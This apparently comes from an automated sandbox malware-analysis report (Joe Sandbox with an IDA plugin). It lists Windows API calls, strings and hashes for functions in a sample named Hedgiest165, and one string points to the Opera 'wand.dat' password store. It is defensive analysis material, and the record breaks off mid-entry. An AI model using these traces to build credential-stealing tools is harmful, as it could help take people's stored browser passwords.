                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                          • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                        • String ID: *.*$dat$wand.dat
                                                                        • API String ID: 2618321458-1828844352
                                                                        • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                        • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                        • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                        • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                        APIs
                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                        • wcslen.MSVCRT ref: 00410C74
                                                                        • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                        • _wcsicmp.MSVCRT ref: 00410CCE
                                                                        • _wcsicmp.MSVCRT ref: 00410CDF
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                        • String ID:
                                                                        • API String ID: 1549203181-0
                                                                        • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                        • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                        • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                        • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00412057
                                                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                        • String ID:
                                                                        • API String ID: 3550944819-0
                                                                        • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                        • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                        • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                        • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                        APIs
                                                                        • free.MSVCRT ref: 0040F561
                                                                        • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                        • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$free
                                                                        • String ID: g4@
                                                                        • API String ID: 2888793982-2133833424
                                                                        • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                        • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                        • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                        • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                        APIs
                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                        • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: @
                                                                        • API String ID: 3510742995-2766056989
                                                                        • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                        • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                        • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                        • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004144E7
                                                                          • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                          • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                        • memset.MSVCRT ref: 0041451A
                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1127616056-0
                                                                        • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                        • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                        • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                        • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                        • malloc.MSVCRT ref: 00417459
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                        • free.MSVCRT ref: 0041747F
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                        • String ID:
                                                                        • API String ID: 2605342592-0
                                                                        • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                        • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                        • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                        • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                        • RegisterClassW.USER32(00000001), ref: 00412428
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                        • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 2678498856-0
                                                                        • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                        • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                        • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                        • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Item
                                                                        • String ID:
                                                                        • API String ID: 3888421826-0
                                                                        • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                        • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                        • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                        • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00417B7B
                                                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                        • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                        • GetLastError.KERNEL32 ref: 00417BB5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$ErrorLastLockUnlockmemset
                                                                        • String ID:
                                                                        • API String ID: 3727323765-0
                                                                        • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                        • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                        • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                        • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F673
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                        • strlen.MSVCRT ref: 0040F6A2
                                                                        • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                        • String ID:
                                                                        • API String ID: 2754987064-0
                                                                        • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                        • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                        • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                        • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F6E2
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                        • strlen.MSVCRT ref: 0040F70D
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                        • String ID:
                                                                        • API String ID: 2754987064-0
                                                                        • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                        • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                        • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                        • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                        APIs
                                                                          • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                          • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                          • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                        • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                        • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                        • String ID:
                                                                        • API String ID: 764393265-0
                                                                        • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                        • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                        • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                        • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                        APIs
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Time$System$File$LocalSpecific
                                                                        • String ID:
                                                                        • API String ID: 979780441-0
                                                                        • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                        • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                        • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                        • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                        APIs
                                                                        • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                        • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                        • String ID:
                                                                        • API String ID: 1386444988-0
                                                                        • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                        • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                        • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                        • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateMessageRectSend
                                                                        • String ID: d=E
                                                                        • API String ID: 909852535-3703654223
                                                                        • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                        • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                        • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                        • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                        APIs
                                                                        • wcschr.MSVCRT ref: 0040F79E
                                                                        • wcschr.MSVCRT ref: 0040F7AC
                                                                          • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                          • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: wcschr$memcpywcslen
                                                                        • String ID: "
                                                                        • API String ID: 1983396471-123907689
                                                                        • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                        • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                        • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                        • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                        APIs
                                                                        • _snwprintf.MSVCRT ref: 0040A398
                                                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintfmemcpy
                                                                        • String ID: %2.2X
                                                                        • API String ID: 2789212964-323797159
                                                                        • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
